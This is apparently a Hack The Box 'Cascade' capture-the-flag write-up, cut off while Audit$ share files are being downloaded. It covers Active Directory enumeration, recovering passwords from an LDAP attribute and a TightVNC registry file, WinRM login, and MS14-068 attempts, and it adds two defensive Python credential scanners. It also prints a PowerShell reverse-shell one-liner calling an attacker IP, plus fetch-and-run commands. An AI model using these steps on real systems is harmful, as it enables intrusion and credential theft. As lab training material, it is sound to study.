---
title: "Hack The Box - Cascade (from a domain user's leaked secret, to a secret leaked in a decompiled program, to a leaked domain-administrator secret)"
author: World'sEnd
layout: true
categories: Internal network security
tags:
  - Target-practice diary
---
You're never a loser until you quit trying.
Hack The Box - Cascade
```
# Nmap 7.92 scan initiated Sun Apr 24 20:24:15 2022 as: nmap -sV -sC -p- -Pn -T4 -oA nmap.txt 10.10.10.182
Nmap scan report for 10.10.10.182
Host is up (0.20s latency).
Not shown: 65520 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-24 12:28:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-04-24T12:29:11
|_ start_date: 2022-04-24T12:22:25
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 24 20:29:54 2022 -- 1 IP address (1 host up) scanned in 339.82 seconds
```
From the Nmap output I can see that the target's domain is cascade.local.
DNS:
I can try a zone transfer; unsurprisingly it fails:
```
$ dig axfr @10.10.10.182 cascade.local
; <<>> DiG 9.18.0-2-Debian <<>> axfr @10.10.10.182 cascade.local
; (1 server found)
;; global options: +cmd
; Transfer failed.
```
RPC:
Enumerating usernames:
If -N is not given to skip the password prompt, the RPC connection is refused, but with -N the null session is accepted and I can enumerate some user information:
```
$ rpcclient -U "" 10.10.10.182 -N
rpcclient $> enumdomusers
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
rpcclient $>
```
That gives me a username wordlist, even if the names all look odd.
Enumerating groups:
```
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[DnsUpdateProxy] rid:[0x44f]
rpcclient $>
```
The server information query is denied:
```
rpcclient $> srvinfo
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
```
Share enumeration is denied too:
```
$> netshareenum
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
```
I try to get the DC host name, which also fails:
```
rpcclient $> getanydcname cascade.local
result was WERR_INVALID_COMPUTERNAME
rpcclient $> getdcname cascade.local
result was WERR_NERR_DCNOTFOUND
rpcclient $>
```
RPC can enumerate a great deal, and can even add users and change user passwords, but all of that failed for lack of privileges:
```
rpcclient $> getanydcname cascade.local
result was WERR_INVALID_COMPUTERNAME
rpcclient $> getdcname cascade.local
result was WERR_NERR_DCNOTFOUND
rpcclient $> getdcname htb.local
result was WERR_NERR_DCNOTFOUND
rpcclient $> gettrustrid
result was WERR_ACCESS_DENIED
rpcclient $> adddriver
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumports
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdata
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumjobs
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumforms
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumalsgroups
Usage: enumalsgroups builtin|domain [access mask] [max_size]
rpcclient $> chgpasswd
Usage: chgpasswd username oldpass newpass
result was NT_STATUS_INVALID_PARAMETER
rpcclient $> enumkey
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumjobs
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumprocs
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
```
But enumdomains does list a second domain name on the target:
```
rpcclient $> enumdomains
name:[CASCADE] idx:[0x0]
name:[Builtin] idx:[0x0]
rpcclient $>
```
That is of no practical help to me right now; my immediate goal is to obtain a valid domain identity.
LDAP:
LDAP also yields a lot of information:
```
$ ldapsearch -x -b "dc=cascade,dc=local" -H ldap://10.10.10.182 > ldap.txt
```
It also returns a lot of noise that is useless to me, so here are a few search tips. If I want to find users that can log in, I can search for the attribute userPrincipalName, for example:
```
userPrincipalName: CascGuest@cascade.local
```
and for the logon name, sAMAccountName, for example:
```
sAMAccountName: Guests
```
To hunt for less obvious usernames, note that every entry LDAP returns is introduced by a comment line in this format:
```
# <name> <type> <domain>
```
Like this:
```
# DnsAdmins, Users, cascade.local
dn: CN=DnsAdmins,CN=Users,DC=cascade,DC=local
objectClass: top
objectClass: group
cn: DnsAdmins
```
Or this:
```
# MicrosoftDNS, System, cascade.local
dn: CN=MicrosoftDNS,CN=System,DC=cascade,DC=local
objectClass: top
objectClass: container
cn: MicrosoftDNS
```
Or this:
```
# Read-only Domain Controllers, Users, cascade.local
dn: CN=Read-only Domain Controllers,CN=Users,DC=cascade,DC=local
# Enterprise Read-only Domain Controllers, Users, cascade.local
dn: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=cascade,DC=local
```
A service account looks like this:
```
# ArkSvc, Services, Users, UK, cascade.local
dn: CN=ArkSvc,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
```
A normal user looks like this:
```
# Steve Smith, Users, UK, cascade.local
dn: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
.....
sAMAccountName: s.smith
sAMAccountType: 805306368
userPrincipalName: s.smith@cascade.local
```
While searching I came across the user Ryan Thompson, whose logon name is:
```
sAMAccountName: r.thompson
```
and whose user principal name is:
```
userPrincipalName: r.thompson@cascade.local
```
What drew my attention to him was one line in his record:
```
cascadeLegacyPwd: clk0bjVldmE=
```
To be precise, it was "pwd" that set off alarm bells. The value looks like base64:
```
$ echo "clk0bjVldmE=" | base64 -d
rY4n5eva
```
It seems I have obtained a password. This also appears to be an attribute unique to this user; perhaps the box author left it for me. As for how much data LDAP returned, a screenshot gives a sense of it:
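The cascadeLegacyPwd attribute above was readable through an anonymous LDAP bind (ldapsearch -x with no credentials), so a defender's first question is whether any other objects carry similar custom attributes. The following Python script is an added example, not part of the original writeup or of any tool it uses: it parses ldapsearch LDIF output (comment lines, folded continuation lines, `::` base64 values), flags attributes whose names suggest a stored credential while skipping the built-in password-policy counters such as pwdLastSet, and base64-decodes the flagged values. The sample LDIF is constructed; only r.thompson's cascadeLegacyPwd value is taken from the page.

```python
import base64
import re

# Constructed sample in the layout ldapsearch prints. r.thompson's
# cascadeLegacyPwd value is the one quoted in the writeup; everything else
# (including the folded dn line and the '::' base64 description) is made up.
SAMPLE_LDIF = """\
# Steve Smith, Users, UK, cascade.local
dn: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
sAMAccountName: s.smith
userPrincipalName: s.smith@cascade.local
pwdLastSet: 132233364470000000
badPwdCount: 0

# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,
 DC=local
objectClass: top
objectClass: person
sAMAccountName: r.thompson
userPrincipalName: r.thompson@cascade.local
cascadeLegacyPwd: clk0bjVldmE=

# ArkSvc, Services, Users, UK, cascade.local
dn: CN=ArkSvc,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
sAMAccountName: arksvc
description:: aGVsbG8=

# search result
search: 2
result: 0 Success
"""

ATTR_RE = re.compile(r"^([A-Za-z][\w.;-]*)(::?) ?(.*)$")
# Attribute names that suggest a stored secret...
CRED_NAME_RE = re.compile(r"pwd|passw|secret|credential", re.IGNORECASE)
# ...minus the standard AD password-policy/bookkeeping attributes, which hold
# timestamps and counters rather than secrets.
BENIGN_ATTRS = {
    "pwdlastset", "badpwdcount", "badpasswordtime", "maxpwdage", "minpwdage",
    "minpwdlength", "pwdhistorylength", "pwdproperties",
}


def parse_ldif(text):
    """Parse ldapsearch LDIF output into a list of {attribute: [values]} dicts.

    Comment lines are skipped, a line starting with one space continues the
    previous line (LDIF folding), and 'attr:: value' carries a base64 value.
    """
    entries, current = [], None
    for line in re.sub(r"\n ", "", text).splitlines():
        if not line.strip():
            if current:
                entries.append(current)
                current = None
            continue
        if line.startswith("#"):
            continue
        m = ATTR_RE.match(line)
        if not m:
            continue
        name, sep, value = m.groups()
        if sep == "::":
            value = base64.b64decode(value).decode("utf-8", "replace")
        if current is None:
            current = {}
        current.setdefault(name, []).append(value)
    if current:
        entries.append(current)
    return entries


def try_base64_text(value):
    """Return the decoded text if value is valid base64 for printable ASCII,
    else None. Legacy password fields are often stored this way, which is
    encoding rather than encryption."""
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text and text.isprintable() else None


def find_credential_attrs(entries):
    """Report (dn, attribute, raw value, decoded value or None) for every
    attribute whose name suggests a stored credential."""
    findings = []
    for entry in entries:
        if "dn" not in entry:  # e.g. the trailing 'search:/result:' block
            continue
        dn = entry["dn"][0]
        for name, values in entry.items():
            if name.lower() in BENIGN_ATTRS or not CRED_NAME_RE.search(name):
                continue
            for value in values:
                findings.append((dn, name, value, try_base64_text(value)))
    return findings


if __name__ == "__main__":
    for dn, name, raw, decoded in find_credential_attrs(parse_ldif(SAMPLE_LDIF)):
        print(f"{dn}\n  {name} = {raw!r}  decodes to {decoded!r}")
```

Run it against a real `ldap.txt` by replacing SAMPLE_LDIF with the file contents; every hit is an attribute that any account able to bind to the directory can read, so the fix is to remove the attribute (or the value) rather than to restrict the query.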
SMB:
SMB does not allow anonymous access:
```
$ smbmap -H 10.10.10.182 -u whoami
[!] Authentication error on 10.10.10.182
```
But I can try the password I just obtained; crackmapexec quickly validates it and enumerates a few things for me:
```
$ crackmapexec smb 10.10.10.182 -u r.thompson -p rY4n5eva
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva
```
WinRM, however, does not work:
```
$ crackmapexec winrm 10.10.10.182 -u r.thompson -p rY4n5eva
SMB 10.10.10.182 5985 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP 10.10.10.182 5985 CASC-DC1 [*] http://10.10.10.182:5985/wsman
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\r.thompson:rY4n5eva
```
WinRM failing means I cannot log in to the target with evil-winrm:
```
$ evil-winrm -i 10.10.10.182 -u r.thompson -p rY4n5eva
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
```
Perhaps I should look for other answers in SMB:
```
$ smbmap -H 10.10.10.182 -u r.thompson -p rY4n5eva
[+] IP: 10.10.10.182:445 Name: 10.10.10.182
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Audit$ NO ACCESS
C$ NO ACCESS Default share
Data READ ONLY
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
print$ READ ONLY Printer Drivers
SYSVOL READ ONLY Logon server share
```
Data stands out; clearly it was put there by a person rather than being a default share.
```
$ smbclient //10.10.10.182/Data -U r.thompson
Enter WORKGROUP\r.thompson's password:
Try "help" to get a list of possible commands.
smb: \> DIR
. D 0 Mon Jan 27 11:27:34 2020
.. D 0 Mon Jan 27 11:27:34 2020
Contractors D 0 Mon Jan 13 09:45:11 2020
Finance D 0 Mon Jan 13 09:45:06 2020
IT D 0 Wed Jan 29 02:04:51 2020
Production D 0 Mon Jan 13 09:45:18 2020
Temps D 0 Mon Jan 13 09:45:15 2020
6553343 blocks of size 4096. 1625321 blocks available
smb: \> cd Temps\
smb: \Temps\> dir
NT_STATUS_ACCESS_DENIED listing \Temps\*
```
Some directories are still denied for lack of permissions, but I found an interesting file:
```
smb: \IT\Temp\s.smith\> dir
. D 0 Wed Jan 29 04:00:01 2020
.. D 0 Wed Jan 29 04:00:01 2020
VNC Install.reg A 2680 Wed Jan 29 03:27:44 2020
6553343 blocks of size 4096. 1624934 blocks available
smb: \IT\Temp\s.smith\> get "VNC Install.reg"
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as VNC Install.reg (1.8 KiloBytes/sec) (average 1.9 KiloBytes/sec)
smb: \IT\Temp\s.smith\>
```
Spaces in Windows paths are a perennial nuisance. I also found a meeting-notes HTML file:
```
smb: \IT\> cd "Email Archives"
smb: \IT\Email Archives\> ls
. D 0 Wed Jan 29 02:00:30 2020
.. D 0 Wed Jan 29 02:00:30 2020
Meeting_Notes_June_2018.html An 2522 Wed Jan 29 02:00:12 2020
6553343 blocks of size 4096. 1625190 blocks available
smb: \IT\Email Archives\> get Meeting_Notes_June_2018.html
getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as Meeting_Notes_June_2018.html (1.9 KiloBytes/sec) (average 1.9 KiloBytes/sec)
smb: \IT\Email Archives\>
```
According to the meeting notes, TempAdmin's password is the same as the normal administrator's. And in the other file, the .reg file:
```
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""
```
It looks like a remote-access configuration, and whoever set it up was rather careless, since the password is stored right in it:
```
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
```
Even though I can't tell what this is, that's fine: I can decode the hex string with the handy vncpasswd.py tool, which is easily found on GitHub. Here is the **link** to download the tool:
```
$ ./vncpasswd.py -d -H 6bcf2a4b6e5aca0f
Decrypted Bin Pass= 'sT333ve2'
Decrypted Hex Pass= '7354333333766532'
```
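An exported .reg file like the one above is a common way for credentials to end up on a file share, and TightVNC's `Password` value is plaintext-equivalent: it is DES-encrypted with a fixed key that is published in the VNC source, which is exactly what vncpasswd.py reverses. The Python below is an added example, not from the writeup or from TightVNC: it parses a regedit export (keys, `""` strings, `dword:` and `hex:` values, including backslash continuation lines) and flags credential-looking values so that such files can be caught in a share audit. The sample export is constructed from values quoted on the page plus a made-up ControlPassword entry that exercises the continuation-line handling.

```python
import re

# Constructed sample in regedit export format, using the TightVNC values
# quoted in the writeup plus a made-up ControlPassword entry that spans a
# backslash continuation line, as regedit writes long hex values.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"UseVncAuthentication"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"ControlPassword"=hex:00,11,22,33,\
  44,55,66,77
"LoopbackOnly"=dword:00000000
"""

KEY_RE = re.compile(r"^\[(.+)\]$")
# Either a quoted value name or '@' for the key's default value.
VALUE_RE = re.compile(r'^(?:"([^"]+)"|(@))=(.*)$')
CRED_NAME_RE = re.compile(r"passw|pwd|secret", re.IGNORECASE)


def decode_value(raw):
    """Decode one .reg value literal: "string", dword:hex, or hex:aa,bb,..."""
    if len(raw) >= 2 and raw.startswith('"') and raw.endswith('"'):
        return re.sub(r"\\(.)", r"\1", raw[1:-1])  # unescape \" and \\
    if raw.startswith("dword:"):
        return int(raw[len("dword:"):], 16)
    if raw.startswith("hex:"):
        return bytes(int(b, 16) for b in raw[len("hex:"):].split(",") if b)
    return raw  # other types (hex(2): etc.) are left as their literal text


def parse_reg(text):
    """Parse a regedit export into {key_path: {value_name: decoded_value}}."""
    # A trailing backslash means the hex byte list continues on the next line.
    text = re.sub(r"\\\r?\n\s*", "", text)
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        km = KEY_RE.match(line)
        if km:
            current = keys.setdefault(km.group(1), {})
            continue
        vm = VALUE_RE.match(line)
        if vm and current is not None:
            current[vm.group(1) or "@"] = decode_value(vm.group(3))
    return keys


def find_credential_values(keys):
    """Return (key_path, value_name, value) for values whose name suggests a
    stored credential. For TightVNC the 8-byte 'Password' blob is DES under a
    fixed, published key, so it must be treated as plaintext."""
    return [
        (path, name, value)
        for path, values in keys.items()
        for name, value in values.items()
        if CRED_NAME_RE.search(name)
    ]


if __name__ == "__main__":
    for path, name, value in find_credential_values(parse_reg(SAMPLE_REG)):
        shown = value.hex() if isinstance(value, bytes) else value
        print(f"{path}\\{name}: {shown}")
```

Point the parser at any .reg file pulled from a share (regedit writes them as UTF-16LE with a BOM, so decode with `utf-16` before parsing); a hit under a remote-access product's key is a credential finding regardless of how the bytes are obfuscated.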
I obtained s.smith's password, sT333ve2. Now I can test it:
```
$ crackmapexec winrm 10.10.10.182 -u s.smith -p sT333ve2
SMB 10.10.10.182 5985 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP 10.10.10.182 5985 CASC-DC1 [*] http://10.10.10.182:5985/wsman
WINRM 10.10.10.182 5985 CASC-DC1 [+] cascade.local\s.smith:sT333ve2 (Pwn3d!)
```
It can be used to log in over WinRM, and it can also view the SMB shares.
Logging in to the target as s.smith:
I am logged in:
```
$ evil-winrm -i 10.10.10.182 -u s.smith -p sT333ve2
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> ls -force
Directory: C:\Users\s.smith\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hsl 1/13/2020 3:36 AM My Music
d--hsl 1/13/2020 3:36 AM My Pictures
d--hsl 1/13/2020 3:36 AM My Videos
*Evil-WinRM* PS C:\Users\s.smith\Documents>
```
And he has the flag:
```
*Evil-WinRM* PS C:\Users\s.smith\Desktop> dir
Directory: C:\Users\s.smith\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/24/2022 1:23 PM 34 user.txt
-a---- 2/4/2021 4:24 PM 1031 WinDirStat.lnk
*Evil-WinRM* PS C:\Users\s.smith\Desktop> type user.txt
```
Environment reconnaissance:
```
*Evil-WinRM* PS C:\Users\s.smith\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\s.smith\Desktop> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
CASCADE\Data Share Alias S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Audit Share Alias S-1-5-21-3332504370-1206983947-1165150453-1137 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\IT Alias S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Remote Management Users Alias S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
*Evil-WinRM* PS C:\Users\s.smith\Desktop>
```
The target is still Windows Server 2008 R2, so I can check whether it is vulnerable to MS14-068, and Metasploit can do the check for me. The MS14-068 check needs the domain, username, password, target IP and the user's SID; the SID can be obtained through RPC:
```
rpcclient $> lookupnames s.smith
s.smith S-1-5-21-3332504370-1206983947-1165150453-1107 (User: 1)
```
```
msf-pro auxiliary(admin/kerberos/ms14_068_kerberos_checksum) > show options
Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN cascade.local yes The Domain (upper case) Ex: DEMO.LOCAL
PASSWORD sT333ve2 yes The Domain User password
RHOSTS 10.10.10.182 yes The target host(s), see https://github.com/rapid7/met
asploit-framework/wiki/Using-Metasploit
RPORT 88 yes The target port
Timeout 10 yes The TCP timeout to establish connection and read data
USER s.smith yes The Domain User
USER_SID S-1-5-21-3332504370-1206983947 yes The Domain User SID, Ex: S-1-5-21-1755879683-36415771
-1165150453-1107 84-3486455962-1000
msf-pro auxiliary(admin/kerberos/ms14_068_kerberos_checksum) > run
[*] Running module against 10.10.10.182
[*] Validating options...
[*] Using domain CASCADE.LOCAL...
[*] 10.10.10.182:88 - Sending AS-REQ...
[*] 10.10.10.182:88 - Parsing AS-REP...
[*] 10.10.10.182:88 - Sending TGS-REQ...
[+] 10.10.10.182:88 - Valid TGS-Response, extracting credentials...
[+] 10.10.10.182:88 - MIT Credential Cache saved on /opt/metasploit/apps/pro/loot/20220424221906_default_10.10.10.182_windows.kerberos_565346.bin
[*] Auxiliary module execution completed
msf-pro auxiliary(admin/kerberos/ms14_068_kerberos_checksum) >
```
It looks like the vulnerability is present, but exploitation failed; perhaps the target has been patched:
```
$ ./goldenPac.py -dc-ip 10.10.10.182 -target-ip 10.10.10.182 cascade.local/s.smith@cascade.local
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
Password:
[*] User SID: S-1-5-21-3332504370-1206983947-1165150453-1107
[-] Couldn't get forest info ([Errno Connection error (cascade.local:445)] [Errno -2] Name or service not known), continuing
[*] Attacking domain controller 10.10.10.182
[*] 10.10.10.182 seems not vulnerable (Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database))
```
Back on the target, I cannot disable AMSI (the Antimalware Scan Interface):
```
*Evil-WinRM* PS C:\Users\s.smith> Bypass-4MSI
Error: An error of type WinRM::WinRMWSManFault happened, message is [WSMAN ERROR CODE: 1726]: <f:WSManFault Code='1726' Machine='10.10.10.182' xmlns:f='http://schemas.microsoft.com/wbem/wsman/1/wsmanfault'><f:Message>The WSMan provider host process did not return a proper response. A provider in the host process may have behaved improperly. </f:Message></f:WSManFault>
Error: Exiting with code 1
```
That's fine though; it doesn't stop winPEAS from enumerating the target environment for me:
```
*Evil-WinRM* PS C:\Users\s.smith> wget http://10.10.16.7/winPEASx86.exe -O winPEASx86.exe
*Evil-WinRM* PS C:\Users\s.smith> .\winPEASx86.exe
```
winPEAS didn't find much for me, not even a privilege-escalation vulnerability; it only confirmed which users are allowed to log in, but I have no passwords for them. If possible I'd still like a reverse shell, because Evil-WinRM is painfully slow. I can try PowerShell: I write a shell.ps1 file locally:
```powershell
$client = New-Object System.Net.Sockets.TCPClient("10.10.16.7",3333);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
Fetch and run it:
```
*Evil-WinRM* PS C:\Users\s.smith\Documents>
*Evil-WinRM* PS C:\Users\s.smith\Documents> wget http://10.10.16.7/shell.ps1 -O shell.ps1
*Evil-WinRM* PS C:\Users\s.smith\Documents> .\shell.ps1
```
Catch the connection:
```
$ nc -lvnp 3333
listening on [any] 3333 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.182] 49678
whoami
cascade\s.smith
PS C:\Users\s.smith\Documents> ls
```
But it didn't help. There are no useful files on the target machine; I couldn't even find the share directories.
Back to SMB:
Perhaps I should explore SMB again, now that I have a new identity:
```
$ smbmap -H 10.10.10.182 -u s.smith -p sT333ve2
[+] IP: 10.10.10.182:445 Name: 10.10.10.182
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Audit$ READ ONLY
C$ NO ACCESS Default share
Data READ ONLY
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
print$ READ ONLY Printer Drivers
SYSVOL READ ONLY Logon server share
```
I can access a new share, Audit$:
```
$ smbclient //10.10.10.182/Audit$ -U s.smith
Enter WORKGROUP\s.smith's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Jan 30 02:01:26 2020
.. D 0 Thu Jan 30 02:01:26 2020
CascAudit.exe An 13312 Wed Jan 29 05:46:51 2020
CascCrypto.dll An 12288 Thu Jan 30 02:00:20 2020
DB D 0 Wed Jan 29 05:40:59 2020
RunAudit.bat A 45 Wed Jan 29 07:29:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 14:38:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 14:38:38 2019
x64 D 0 Mon Jan 27 06:25:27 2020
x86 D 0 Mon Jan 27 06:25:27 2020
6553343 blocks of size 4096. 1611448 blocks available
```
There is a lot here:
```
smb: \> cd x86
smb: \x86\> dir
. D 0 Mon Jan 27 06:25:27 2020
.. D 0 Mon Jan 27 06:25:27 2020
SQLite.Interop.dll A 1246720 Sun Oct 27 14:34:20 2019
6553343 blocks of size 4096. 1611448 blocks available
smb: \x86\> cd ..
smb: \> mget *
Get file CascAudit.exe? yes
getting file \CascAudit.exe of size 13312 as CascAudit.exe (10.6 KiloBytes/sec) (average 10.6 KiloBytes/sec)
Get file CascCrypto.dll? yes
getting file \CascCrypto.dll of size 12288 as CascCrypto.dll (10.7 KiloBytes/sec) (average 10.6 KiloBytes/sec)
Get file RunAudit.bat? yes
getting file \RunAudit.bat of size 45 as RunAudit.bat (0.0 KiloBytes/sec) (average 7.2 KiloBytes/sec)
Get file System.Data.SQLite.dll? yes
getting file \System.Data.SQLite.dll of size 363520 as System.Data.SQLite.dll (109.1 KiloBytes/sec) (average 56.6 KiloBytes/sec)
Get file System.Data.SQLite.EF6.dll? yes
getting file \System.Data.SQLite.EF6.dll of size 186880 as System.Data.SQLite.EF6.dll (97.4 KiloBytes/sec) (average 65.5 KiloBytes/sec)
